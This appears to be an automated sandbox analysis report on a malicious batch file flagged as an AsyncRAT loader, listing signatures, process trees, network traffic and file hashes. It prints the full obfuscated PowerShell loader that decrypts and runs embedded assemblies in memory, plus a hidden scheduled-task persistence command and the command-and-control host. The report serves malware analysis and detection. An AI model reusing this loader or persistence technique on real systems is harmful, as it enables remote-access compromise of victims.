Analysis Overview
SHA256
a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b
Threat Level: Known bad
The file dotnet.bat was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-27 22:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-27 22:08
Reported
2024-06-27 22:09
Platform
win7-20240611-en
Max time kernel
34s
Max time network
19s
Command Line
Signatures
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/1396-2-0x0000000074131000-0x0000000074132000-memory.dmp
memory/1396-3-0x0000000074130000-0x00000000746DB000-memory.dmp
memory/1396-4-0x0000000074130000-0x00000000746DB000-memory.dmp
memory/1396-5-0x0000000074130000-0x00000000746DB000-memory.dmp
memory/1396-6-0x0000000074130000-0x00000000746DB000-memory.dmp
memory/1396-7-0x0000000074130000-0x00000000746DB000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-27 22:08
Reported
2024-06-27 22:09
Platform
win10v2004-20240611-en
Max time kernel
39s
Max time network
39s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dotnet')
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network15166Man.cmd';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\timeout.exe
timeout /nobreak /t 1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network15166Man')
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stormx.dynu.net | udp |
| DE | 94.130.130.51:77 | stormx.dynu.net | tcp |
| DE | 94.130.130.51:77 | stormx.dynu.net | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| DE | 94.130.130.51:77 | stormx.dynu.net | tcp |
Files
memory/1916-0-0x0000000074F2E000-0x0000000074F2F000-memory.dmp
memory/1916-1-0x0000000004CD0000-0x0000000004D06000-memory.dmp
memory/1916-3-0x0000000005340000-0x0000000005968000-memory.dmp
memory/1916-2-0x0000000074F20000-0x00000000756D0000-memory.dmp
memory/1916-4-0x0000000074F20000-0x00000000756D0000-memory.dmp
memory/1916-5-0x00000000052C0000-0x00000000052E2000-memory.dmp
memory/1916-6-0x00000000059E0000-0x0000000005A46000-memory.dmp
memory/1916-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puf2xrl2.0of.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1916-17-0x0000000005C40000-0x0000000005F94000-memory.dmp
memory/1916-18-0x00000000061C0000-0x00000000061DE000-memory.dmp
memory/1916-19-0x00000000061E0000-0x000000000622C000-memory.dmp
memory/1916-20-0x0000000006720000-0x0000000006764000-memory.dmp
memory/1916-21-0x00000000074A0000-0x0000000007516000-memory.dmp
memory/1916-22-0x0000000007BA0000-0x000000000821A000-memory.dmp
memory/1916-23-0x0000000007540000-0x000000000755A000-memory.dmp
memory/3444-24-0x0000000074F20000-0x00000000756D0000-memory.dmp
memory/3444-25-0x0000000074F20000-0x00000000756D0000-memory.dmp
memory/3444-26-0x0000000074F20000-0x00000000756D0000-memory.dmp
memory/3444-38-0x0000000074F20000-0x00000000756D0000-memory.dmp
memory/1916-39-0x0000000007620000-0x0000000007630000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 938ffc2cba917b243d86b2cf76dcefb4 |
| SHA1 | 234b53d91d075f16cc63c731eefdae278e2faad3 |
| SHA256 | 5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca |
| SHA512 | e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314 |
memory/4824-50-0x0000000007AB0000-0x0000000007AE2000-memory.dmp
memory/4824-51-0x0000000070CC0000-0x0000000070D0C000-memory.dmp
memory/4824-61-0x0000000007A90000-0x0000000007AAE000-memory.dmp
memory/4824-62-0x0000000007B00000-0x0000000007BA3000-memory.dmp
memory/4824-63-0x0000000007CC0000-0x0000000007CCA000-memory.dmp
memory/4824-64-0x0000000007EE0000-0x0000000007F76000-memory.dmp
memory/4824-65-0x0000000007E50000-0x0000000007E61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bc5e40517fe8f3f73fdd3a27d4fe7d6d |
| SHA1 | 0b0ea9ee27a747a5b6a4121de931dd15f0429bb4 |
| SHA256 | a7e28126148286b23e0a2e3146d2c7a7a4b5d780cc8ff50bb4e3f4c7f486a8c4 |
| SHA512 | c169fbf7c0a722abffd7802bbfc7559adacc3e7ba9ffcfe2825f2055d8860f8ddf90aa5ecffb2c9b7e8bdb409479870c463048af1d98e161ad854644f45f0eaf |
memory/800-77-0x0000000070CC0000-0x0000000070D0C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | ca86c56c43469d64429b0ceac9a6244a |
| SHA1 | 096af882cffc54003eb90c70ea0e7430bab218ce |
| SHA256 | 8e9e05e948ea3ae93545f3c079e718a24d2b3224fa1686eae5fbe3621d74059c |
| SHA512 | 634c878e298022da59fdcc2c33b6514bf5d45d6e4d893d2646c63e1922e5066c98b88d7c09256e6aadeba18012406fb896ff2b337eb16f886d162493979adeeb |
C:\Users\Admin\AppData\Roaming\Network15166Man.cmd
| MD5 | 3dfb1c3ff09dc31a4096b821b9ff204b |
| SHA1 | 8604c300175bf352b7612412c6521064a2514674 |
| SHA256 | a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b |
| SHA512 | 895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172 |
memory/1916-111-0x0000000074F20000-0x00000000756D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 86340a2269cc2e3ed5f72aff7c6e87b7 |
| SHA1 | ed4e05673352bf376a4ea5a0a3c81e935f68bbd7 |
| SHA256 | 1238383796584fcf9f5bfd63424b06b685dc73b18edf53bf52114cdc58363ffc |
| SHA512 | 9df41060170fed81a12aca98c3f6183201c3636bb1f76f7e2b3ccb7d0be66b523bb16f28d8d1501238bcf9b2bca527c84c206334239b0ee2566286b782c705ca |
memory/4212-123-0x0000000070CC0000-0x0000000070D0C000-memory.dmp
memory/4212-133-0x00000000072E0000-0x0000000007383000-memory.dmp
memory/4212-134-0x0000000007640000-0x0000000007651000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 632280a520f1aaf45cee26c44f846468 |
| SHA1 | 69f0e1002e99101089e42072f0c8505a5f542353 |
| SHA256 | 122dbb93b1e8f381b06abf0cb7901ea14709b57c941b2e16abb4c2d70efd1018 |
| SHA512 | 94237bdbdd13df82ca75362878fee31f8ca9952c872cd2961f27ee99d9bf9f4718e9bfab12f4e59a520ee10fdbc10596d995f2dcbfc2117a3389012b61078eed |
memory/4344-146-0x0000000070CC0000-0x0000000070D0C000-memory.dmp
memory/464-157-0x0000000005290000-0x00000000052A6000-memory.dmp
memory/464-158-0x0000000008B60000-0x0000000009104000-memory.dmp
memory/464-159-0x0000000007E70000-0x0000000007F02000-memory.dmp
memory/464-160-0x0000000007E50000-0x0000000007E5A000-memory.dmp